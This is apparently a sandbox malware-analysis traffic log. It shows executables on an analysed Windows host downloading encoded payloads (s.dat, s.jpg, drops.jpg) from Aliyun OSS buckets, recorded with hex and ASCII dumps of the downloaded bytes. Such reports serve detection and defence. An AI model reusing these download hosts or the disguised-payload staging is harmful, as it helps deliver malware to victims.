w#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v\|}ThkcJ{K-{u)%\|!Q;b:Bmyv)B0.xfcI9a/}pb"3y
2025-01-12 03:11:13 UTC	4096	IN	Data Raw: fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 f6 1c ce 71 0e c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50 85 Data Ascii: eE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
2025-01-12 03:11:13 UTC	4096	IN	Data Raw: 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79 a3 Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^\|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
2025-01-12 03:11:13 UTC	4096	IN	Data Raw: 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4 af Data Ascii: e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cgOnx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M>zvGKV?oJy_y@)5f)KBzyt=U%G}}
2025-01-12 03:11:13 UTC	4096	IN	Data Raw: d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7 5f Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z_
2025-01-12 03:11:13 UTC	4096	IN	Data Raw: 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64 96 Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M\|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49769	47.101.26.25	443	6504	C:\Users\user\Desktop\1387457-38765948.15.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-12 03:11:20 UTC	107	OUT	GET /s.dat HTTP/1.1 User-Agent: 3M Host: jcoiw1.oss-cn-shanghai.aliyuncs.com Cache-Control: no-cache
2025-01-12 03:11:20 UTC	560	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sun, 12 Jan 2025 03:11:20 GMT Content-Type: application/octet-stream Content-Length: 28272 Connection: close x-oss-request-id: 678332D8897E313432976EBF Accept-Ranges: bytes ETag: "3398FEF004CF7BA322FE7040ECD6FA86" Last-Modified: Sun, 12 Jan 2025 03:11:01 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 10620241250143286742 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: M5j+8ATPe6Mi/nBA7Nb6hg== x-oss-server-time: 7
2025-01-12 03:11:20 UTC	3536	IN	Data Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40 Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
2025-01-12 03:11:20 UTC	4096	IN	Data Raw: 5f 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92 86 Data Ascii: _##V'3+f~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
2025-01-12 03:11:20 UTC	4096	IN	Data Raw: 07 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6 dc Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH
2025-01-12 03:11:20 UTC	4096	IN	Data Raw: 30 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f 41 Data Ascii: 0JY9sEAOyv1\|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4\|4%A}bkkkkEv\|sJ"KKKKD\@NKSA
2025-01-12 03:11:20 UTC	4096	IN	Data Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce Data Ascii: ((((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
2025-01-12 03:11:20 UTC	4096	IN	Data Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c Data Ascii: ,$LDld=5}u]U
2025-01-12 03:11:20 UTC	4096	IN	Data Raw: 47 a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed e2 Data Ascii: G<EB`."+LVpfVgUo0\|\~:KbkY5xCM$8^330021228SXOBIFe-
2025-01-12 03:11:20 UTC	160	IN	Data Raw: bc 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 19 23 eb 75 Data Ascii: VH <dMs~/rSixpGTz& dnCz\|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpS#u

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49780	47.101.26.25	443	6504	C:\Users\user\Desktop\1387457-38765948.15.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-12 03:11:22 UTC	107	OUT	GET /s.jpg HTTP/1.1 User-Agent: 3M Host: jcoiw1.oss-cn-shanghai.aliyuncs.com Cache-Control: no-cache
2025-01-12 03:11:22 UTC	543	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sun, 12 Jan 2025 03:11:22 GMT Content-Type: image/jpeg Content-Length: 8299 Connection: close x-oss-request-id: 678332DAE5C23A383185D73C Accept-Ranges: bytes ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7" Last-Modified: Sat, 11 Jan 2025 10:53:19 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 692387538176721524 x-oss-storage-class: Standard x-oss-ec: 0048-00000103 Content-Disposition: attachment x-oss-force-download: true Content-MD5: m9tqSvaBRwuFo9Rq9aTypw== x-oss-server-time: 1
2025-01-12 03:11:22 UTC	3553	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2025-01-12 03:11:22 UTC	4096	IN	Data Raw: 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43 a5 Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy\|9_;]:^8)'@/Ysq$hQ=2[C
2025-01-12 03:11:22 UTC	650	IN	Data Raw: f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84 90 Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK\|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji\|}~

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49865	118.178.60.9	443	7108	C:\Users\user\Documents\cajXRH.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-12 03:11:39 UTC	114	OUT	GET /drops.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-12 03:11:39 UTC	545	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sun, 12 Jan 2025 03:11:39 GMT Content-Type: image/jpeg Content-Length: 37274 Connection: close x-oss-request-id: 678332EBEE852137328DB65C Accept-Ranges: bytes ETag: "6D4DEB9526F3973DE0F9DCE9392F8EA7" Last-Modified: Wed, 23 Oct 2024 04:47:27 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 9193697774326766004 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: bU3rlSbzlz3g+dzpOS+Opw== x-oss-server-time: 4
2025-01-12 03:11:39 UTC	3551	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 9d 0b f8 6e e5 94 c0 97 91 14 26 45 21 4a 7f 25 4d 17 94 22 b9 cc 39 85 12 8d 90 2e 22 a7 9b 88 48 11 a9 4c 87 92 90 a4 d1 4c 49 3a 88 29 a1 90 4b 37 c2 14 21 83 34 51 f8 1f f7 7b ee cc 64 cc cc fe b5 ff 5b df f9 e6 fb fe df 5a 7b bf b7 ef db eb f7 3c eb 79 3c 39 ff 6f af fd ee 77 af fd be eb 5d 17 11 c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 cc 1a 95 ac 33 25 b2 46 a4 31 70 9c de 72 44 25 ff 3b 25 72 44 a4 31 70 9c de e2 06 c0 71 7a 8c 1b 00 c7 e9 31 Data Ascii: PNGIHDR\rfpHYs IDATxn&E!J%M"9."HLLI:)K7!4Q{d[Z{<y<9ow]qqqqqqqqqqqqqqqqq3%F1prD%;%rD1pqz1
2025-01-12 03:11:39 UTC	4096	IN	Data Raw: b8 15 4d f0 da 0b 73 29 d8 06 f6 9f 9a 49 70 40 2e 05 0b 01 87 5f 9b 3d 3f fb 46 f6 f7 6d f6 f6 a1 c1 89 8a 9f a0 4d d0 15 3e 81 52 1c 83 39 a1 dc d8 a4 b1 fa 64 36 ed 8c e0 b1 d4 38 8c b0 7a eb 66 d2 b1 04 38 ea 6b e3 ed c7 43 bf 5d 06 7d 27 41 5d 01 4b 93 95 46 38 1d 28 e9 88 30 07 7c dd 35 db 80 d2 93 d3 6e 43 db 93 ed f2 5c 0a 16 82 a5 2d 59 23 ef 97 b2 7d 26 78 b5 3f 28 f6 fb 7a 57 0e 65 0b 82 17 5b 53 7b f0 79 b9 14 b4 a0 ad c2 72 68 2e 05 0b e0 b9 62 7f 49 e8 29 37 0d b5 09 f0 0d d0 e7 ce 7a 7f 7d df 0e 5e 2d 93 c7 e8 b2 6c da 29 21 c0 42 13 40 32 75 5e cd 80 10 db 6f e9 43 c0 76 ea a8 2c 9a 76 83 c0 2a 4b ec 00 01 61 a5 e5 0e a4 84 90 df 49 63 c4 b6 79 52 ad 81 ac 68 3b ec 7c 36 97 82 05 40 a5 18 cb 97 71 1a 5f fe 06 8c 80 e5 5e 2f cd a3 66 11 cc Data Ascii: Ms)Ip@._=?FmM>R9d68zf8kC]}'A]KF8(0\|5nC\-Y#}&x?(zWe[S{yrh.bI)7z}^-l)!B@2u^oCv,v*KaIcyRh;\|6@q_^/f
